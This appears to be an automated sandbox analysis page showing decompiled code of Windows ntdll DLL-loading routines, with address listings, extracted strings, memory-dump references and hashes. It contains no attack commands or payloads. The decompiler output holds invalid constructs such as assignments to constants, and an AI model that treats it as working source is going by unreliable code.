								if( *(_t421 + 0x18) == 0x40000003) {
									_t402 = _t421 - 0x34;
									_t411 = E025EA0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
									__eflags = _t411 - _t401;
									if(_t411 >= _t401) {
										goto L35;
									}
									goto L28;
								}
								goto L35;
							}
							__eflags =  *(_t421 + 0x14) & 0x00000002;
							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
								goto L117;
							}
							_t402 = 0x2000;
							_t303 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *(_t303 + 0x16) & 0x00002000;
							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
								L115:
								__eflags =  *(_t303 + 0x5e) & 0x00000080;
								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
									goto L33;
								}
								_t411 = 0xc0000428;
								goto L28;
							}
							__eflags = _t417 - _t401;
							if(_t417 == _t401) {
								goto L33;
							}
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
								goto L33;
							}
							goto L115;
						}
						_push(_t421 - 0x68);
						_push(_t401);
						_push(_t401);
						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
						_push(3);
						E0259F535(0x4000000e, _t417, __eflags);
						_t355 =  *((intOrPtr*)(_t421 - 0x68));
						__eflags =  *((short*)(_t355 + 0x48)) - 3;
						if( *((short*)(_t355 + 0x48)) <= 3) {
							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
							_push(_t421 - 0x50);
							_push(2);
							_push(_t421 - 0x40);
							_push(1);
							_push(1);
							_t411 = E02591614(0x4000000e);
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
								goto L35;
							}
							__eflags =  *0x2670001;
							if( *0x2670001 != 0) {
								 *0x2679240 =  *0x2679240 + 1;
							}
							L27:
							_t411 = 0xc000007b;
							goto L28;
						}
						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E0258FC90(0xffffffff);
							E0258F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							E0258F9F0( *(_t421 - 0x28));
							E0259E1C6(_t421 - 0x3c);
							_t410 = 0;
							E0259E025(_t402,  *0x2670104, 0,  *((intOrPtr*)(_t421 - 0x30)));
							_t401 = 1;
							L11:
							_t419 = E0259E825( *(_t421 + 8));
							__eflags = _t419 - 2;
							if(_t419 != 2) {
								L54:
								_t411 = E025B1C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
								__eflags = _t411;
								if(_t411 < 0) {
									__eflags = _t411 - 0xc0000135;
									if(_t411 == 0xc0000135) {
										__eflags = _t401;
										if(_t401 != 0) {
											_t411 = 0xc000007b;
										} else {
											E025C7CC4( *(_t421 + 8));
											L025B2D04(0xc0000135,  *(_t421 + 8), 0);
										}
									}
									goto L14;
								}
								__eflags =  *(_t421 + 0xf);
								if( *(_t421 + 0xf) == 0) {
									L84:
									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
									_t416 = 0;
									 *((intOrPtr*)(_t421 - 0x84)) = 0;
									0x840 = 0x40;
									__eflags =  *0x267924c;
									if( *0x267924c == 0) {
									}
									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
									_push(0x60);
									_push(5);
									_push(_t421 - 0x94);
									_push(_t421 - 0x88);
									_push(0x100021);
									_t411 = L0258FD74(_t421 - 0x28);
									__eflags = _t411 - _t416;
									if(_t411 < _t416) {
										__eflags = _t411 - 0xc0000034;
										if(_t411 == 0xc0000034) {
											L88:
											_t411 = 0xc0000135;
											goto L31;
										}
										__eflags = _t411 - 0xc000003a;
										if(_t411 != 0xc000003a) {
											goto L31;
										}
										goto L88;
									} else {
										_push( *(_t421 - 0x28));
										_push(0x1000000);
										_push(0x10);
										_push(_t416);
										_push(_t416);
										_push(0xf);
										_t411 = E0258FFB4(_t421 - 0x2c);
										__eflags = _t411 - _t416;
										if(_t411 < _t416) {
											__eflags = _t411 - 0xc0000017;
											if(_t411 != 0xc0000017) {
												__eflags = _t411 - 0xc000009a;
												if(_t411 != 0xc000009a) {
													__eflags = _t411 - 0xc000012d;
													if(_t411 != 0xc000012d) {
														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
														_push(_t421 - 0x50);
														_push(1);
														_push(_t421 - 0x40);
														_push(1);
														_push(1);
														_t288 = E02591614(0xc000007b);
														__eflags = _t288;
														if(_t288 >= 0) {
															__eflags =  *0x2670001;
															if( *0x2670001 != 0) {
																 *0x2679240 =  *0x2679240 + 1;
															}
														}
													}
												}
											}
											goto L30;
										}
										__eflags =  *(_t421 + 0x14) & 0x00001000;
										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
											goto L19;
										}
										_t411 = L025B1D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
										__eflags = _t411;
										if(_t411 >= 0) {
											goto L19;
										}
										__eflags = _t411 - 0xc0000225;
										if(_t411 == 0xc0000225) {
											goto L19;
										} else {
											_t401 = 0;
											goto L29;
										}
										goto L54;
									}
								}
								__eflags = _t419 - 2;
								if(_t419 == 2) {
									goto L84;
								}
								_t376 = E0259FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
								__eflags = _t376;
								if(_t376 == 0) {
									goto L84;
								}
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
								_t411 = 0;
								goto L31;
							}
							_t378 = E0259FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t378;
							if(_t378 == 0) {
								goto L54;
							}
							goto L13;
						}
						goto L27;
					}
					L10:
					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
					goto L11;
				}
			}

0x025ae6c1
0x025ae6c6
0x025ae6cb
0x025ae6d0
0x025ae6d8
0x025ae6e1
0x025efb40
0x025efb5a
0x025efb5f
0x025efb5f
0x025ae6e7
0x025ae6f2
0x025efb67
0x025efb67
0x025ae6f8
0x025ae6fa
0x025ae6fd
0x025ae700
0x025ae703
0x025ae706
0x025ae70a
0x025ae70f
0x025bc259
0x025bc25e
0x025bc260
0x00000000
0x00000000
0x025bc272
0x025bc274
0x025bc276
0x00000000
0x00000000
0x025bc28c
0x025bc28e
0x025bc290
0x025efb71
0x00000000
0x025efb71
0x025bc296
0x00000000
0x025ae715
0x025ae715
0x025ae718
0x025ae71e
0x025ae722
0x025ae726
0x025ae72d
0x025ae739
0x00000000
0x025ae735
0x025ae736
0x00000000
0x025ae736
0x025ae72d
0x025ae73d
0x025ae741
0x025aec24
0x025aec29
0x025aec2b
0x025ae77f
0x025ae782
0x025ae785
0x025ae785
0x025ae787
0x025ae787
0x025ae78c
0x025ae78f
0x025ae795
0x025efe2e
0x025efe33
0x025ae79b
0x025ae7a0
0x025ae7a6
0x025efe3b
0x025efe3b
0x025ae7b3
0x025ae7b3
0x025aec47
0x025aec49
0x025aec4b
0x025b2a55
0x025b2a5b
0x025efbc5
0x00000000
0x025efbc5
0x00000000
0x025b2a61
0x025aec51
0x025aec5c
0x025aec61
0x025aec66
0x025aec82
0x025aec84
0x025aec86
0x025aec88
0x025aed2e
0x025aed31
0x025aed36
0x025aed39
0x025aed4c
0x025aed57
0x00000000
0x025aed57
0x025aed3b
0x025aed3e
0x025aed43
0x025aed47
0x00000000
0x025aed47
0x025aec8e
0x025aec94
0x025aec95
0x025aec96
0x025aec99
0x025aec9c
0x025aeca2
0x025aeca4
0x025aeca6
0x025aed24
0x025aed24
0x025aed29
0x00000000
0x025aed29
0x025aeca8
0x025aecab
0x025b163f
0x025b1644
0x025b1646
0x00000000
0x00000000
0x025b164f
0x025b1651
0x00000000
0x025b1651
0x025aecb1
0x025aecb1
0x025aecbb
0x025efc49
0x025efc4e
0x025efc51
0x025efc55
0x00000000
0x00000000
0x025efc5b
0x025efc62
0x00000000
0x00000000
0x025efc68
0x025efc69
0x025efc71
0x025efc72
0x025efc77
0x025efc7c
0x025efc83
0x00000000
0x00000000
0x025efc89
0x025efc9b
0x025efc9d
0x025efca0
0x025ea0de
0x025ea0e0
0x00000000
0x025ea0e6
0x00000000
0x025ea0e6
0x025ea0e0
0x025aecc1
0x025aecd4
0x025aecd6
0x025aecd9
0x025aecdb
0x025c8599
0x025c859d
0x00000000
0x00000000
0x025efce0
0x025efce5
0x025efce7
0x025efce9
0x00000000
0x025efcef
0x025efcef
0x025efcf6
0x00000000
0x025efcf6
0x025c85a8
0x025c85a8
0x025c85ab
0x025c85af
0x025b027b
0x025b027b
0x025b0281
0x025b0289
0x025b028e
0x025b0291
0x025b1dbe
0x025b1dc7
0x025b1dc7
0x025b029a
0x025b029f
0x00000000
0x025b029f
0x025c85c1
0x025c85c3
0x025c85c5
0x025efdf6
0x025efdfb
0x025efdfb
0x025efdfd
0x025efdfd
0x025efe04
0x025efe0d
0x025efe0d
0x00000000
0x025efe04
0x025c85cb
0x00000000
0x025c85cb
0x025aece1
0x025aece6
0x025aece9
0x025efd7f
0x025efd86
0x025efdc2
0x025efdc2
0x025b0107
0x025b0107
0x025b010c
0x025b0110
0x025b0123
0x025b0123
0x025b013b
0x025b013d
0x025b013f
0x025efdca
0x00000000
0x025b0145
0x025b0148
0x025b014b
0x025b014f
0x025ea0eb
0x025b0155
0x025b0155
0x025b0158
0x025b015b
0x025b4ebc
0x025b0161
0x025b0164
0x025b0164
0x025b0164
0x025b0167
0x025b0167
0x025b0170
0x025b0176
0x025b017c
0x025b017f
0x025b017f
0x025b0185
0x025b018a
0x025b0190
0x025b0195
0x025b0199
0x025b01a3
0x025b01a6
0x025b01a8
0x025b01ab
0x025b01ae
0x025b01ae
0x025b01b1
0x025b01b4
0x025b01b6
0x025b01b6
0x025b01b9
0x025b01bc
0x025b01be
0x025b01be
0x025b01c1
0x025b01c4
0x025b01c6
0x025b01cf
0x025b01d2
0x025b01d7
0x025b01dd
0x025b01e3
0x025b01e3
0x025b01e5
0x00000000
0x00000000
0x025efdd1
0x025efdd8
0x025efddf
0x025efde6
0x025efde6
0x025b01eb
0x025b01ee
0x025b01f1
0x025b01f2
0x025b01f7
0x025b01f8
0x025b01fd
0x025b0202
0x025b0205
0x025b0207
0x025b0209
0x025b0209
0x025b0209
0x025b0209
0x025b020c
0x025b020c
0x025b0218
0x025b021f
0x025b0222
0x025b0224
0x025b0227
0x025b0229
0x025b022c
0x025b0231
0x025b0237
0x025b023a
0x025b023c
0x025b0242
0x025b0242
0x025b0245
0x025b024b
0x025b0251
0x025b0254
0x025b0256
0x025b0266
0x025b026c
0x025b0271
0x025b0275
0x00000000
0x00000000
0x00000000
0x00000000
0x025b0275
0x025b013f
0x025b0112
0x025b0116
0x025b011d
0x025ea0bf
0x025ea0cf
0x025ea0d1
0x025ea0d3
0x00000000
0x00000000
0x00000000
0x025ea0d9
0x00000000
0x025b011d
0x025efd88
0x025efd8c
0x00000000
0x00000000
0x025efd8e
0x025efd93
0x025efd96
0x025efd9a
0x025efdae
0x025efdae
0x025efdb2
0x00000000
0x00000000
0x025efdb8
0x00000000
0x025efdb8
0x025efd9c
0x025efd9e
0x00000000
0x00000000
0x025efda4
0x025efda8
0x00000000
0x00000000
0x00000000
0x025efda8
0x025aecf2
0x025aecf3
0x025aecf4
0x025aecfe
0x025aed01
0x025aed03
0x025aed08
0x025aed0b
0x025aed10
0x025efd3c
0x025efd42
0x025efd43
0x025efd48
0x025efd49
0x025efd4b
0x025efd53
0x025efd55
0x025efd57
0x00000000
0x00000000
0x025efd5d
0x025efd61
0x00000000
0x00000000
0x025efd67
0x025efd6e
0x025efd74
0x025efd74
0x025aed1f
0x025aed1f
0x00000000
0x025aed1f
0x025aed16
0x025aed19
0x025efcfe
0x025efd03
0x025efd0b
0x025efd13
0x025efd1c
0x025efd24
0x025efd2d
0x025efd32
0x025ae758
0x025ae760
0x025ae762
0x025ae765
0x025b1d5d
0x025b1d79
0x025b1d7b
0x025b1d7d
0x025c7c97
0x025c7c99
0x025c7c9f
0x025c7ca1
0x025efbcc
0x025c7ca7
0x025c7caa
0x025c7cb5
0x025c7cb5
0x025c7ca1
0x00000000
0x025c7c99
0x025b1d83
0x025b1d87
0x025efb7b
0x025efb7b
0x025efb85
0x025efb87
0x025efb8f
0x025efb90
0x025efb97
0x025efb97
0x025b1cbd
0x025b1cc3
0x025b1cc6
0x025b1cc9
0x025b1ccc
0x025b1cce
0x025b1cd6
0x025b1cdd
0x025b1cde
0x025b1cec
0x025b1cee
0x025b1cf0
0x025efba7
0x025efbad
0x025efbbb
0x025efbbb
0x00000000
0x025efbbb
0x025efbaf
0x025efbb5
0x00000000
0x00000000
0x00000000
0x025b1cf6
0x025b1cf6
0x025b1cf9
0x025b1cfe
0x025b1d00
0x025b1d01
0x025b1d02
0x025b1d0d
0x025b1d0f
0x025b1d11
0x025efbd6
0x025efbdc
0x025efbe2
0x025efbe8
0x025efbee
0x025efbf4
0x025efbfd
0x025efc03
0x025efc04
0x025efc09
0x025efc0a
0x025efc0c
0x025efc13
0x025efc18
0x025efc1a
0x025efc20
0x025efc27
0x025efc2d
0x025efc2d
0x025efc27
0x025efc1a
0x025efbf4
0x025efbe8
0x00000000
0x025efbdc
0x025b1d17
0x025b1d1e
0x00000000
0x00000000
0x025b1d30
0x025b1d32
0x025b1d34
0x00000000
0x00000000
0x025efc38
0x025efc3e
0x00000000
0x025efc44
0x025c3566
0x00000000
0x025c3566
0x00000000
0x025efc3e
0x025b1cf0
0x025b1d8d
0x025b1d90
0x00000000
0x00000000
0x025b1da1
0x025b1da6
0x025b1da8
0x00000000
0x00000000
0x025b1db1
0x025b1db4
0x00000000
0x025b1db4
0x025ae772
0x025ae777
0x025ae779
0x00000000
0x00000000
0x00000000
0x025ae779
0x00000000
0x025aed19
0x025ae747
0x025ae749
0x025ae74f
0x025ae755
0x00000000
0x025ae755

Strings

DLL name: %wZ DLL path: %wZ, xrefs: 025EFB44
Status: 0x%08lx, xrefs: 025EFE18
X&q, xrefs: 025B0231
d:\w7rtm\minkernel\ntdll\ldrfind.c, xrefs: 025EFB55, 025EFE29
`&q, xrefs: 025B024B
|s, xrefs: 025B022C, 025B023C
LdrpFindOrMapDll, xrefs: 025EFB4B, 025EFE1F

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$Status: 0x%08lx$X&q$`&q$d:\w7rtm\minkernel\ntdll\ldrfind.c$|s
API String ID: 0-4165998036
Opcode ID: d9b2187a3e5eee20e636c3fbe757ac52541e69788af22f4bb4855cf1ef26cfed
Instruction ID: 910a93a58e24093f03e856af9e6f3377de44bca5e3b224f23a877a210f76fd4a
Opcode Fuzzy Hash: d9b2187a3e5eee20e636c3fbe757ac52541e69788af22f4bb4855cf1ef26cfed
Instruction Fuzzy Hash: AE329B71800249AFDF22DFA4C891BEEBBFAFF48304F14442AE945A7260D7719985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0259F3CF, Relevance: 9.2, Strings: 7, Instructions: 466
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0259F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0x2672088; // 0x77fdf0e4
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				E0259DFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = L0259ED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E0259E1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							E025AB90D(_t198, _v72);
						}
						return E0259E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E025C78E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E025C78E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E025A8980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E0261C0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E025C78E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
													E025A8980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = E0259FBD7(1,  &_v68, 0x25cb024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E026277A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E025C78E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E025A8980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E025C78E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E025A8980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
						E025E3F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E025BC507(_t303, _v124, _v120,  &_v60, 0x25bcdad,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}

0x0259f3cf
0x0259f3da
0x0259f3e1
0x0259f3eb
0x0259f3f4
0x0259f3f9
0x0259f3fb
0x0259f3fe
0x0259f408
0x0259f40f
0x0259f412
0x0259f41a
0x0259f41d
0x0259f420
0x0259f423
0x0259f42b
0x0259f42e
0x0259f42f
0x0259f433
0x0259f439
0x0259f444
0x0259f44e
0x0259f451
0x0259f454
0x0259f457
0x0259f45f
0x0259f463
0x025bc2bb
0x025bc2bf
0x025bc4fb
0x025bc4fb
0x0259f475
0x0259f475
0x0259f478
0x0259f47d
0x0259f481
0x025f3bf8
0x025f3bfb
0x025f3c00
0x025f3c00
0x0259f48a
0x0259f48d
0x0259f48d
0x0259f490
